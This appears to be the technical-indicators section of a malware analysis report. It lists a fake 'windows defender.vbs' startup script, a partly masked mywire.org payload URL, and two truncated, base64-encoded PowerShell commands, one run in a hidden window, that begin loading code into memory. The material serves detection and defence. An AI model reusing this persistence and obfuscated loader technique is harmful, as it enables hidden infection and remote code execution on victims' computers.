Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows defender.vbs
- http://ch###.mywire.org/f.jpg
- DNS ASK ch###.mywire.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...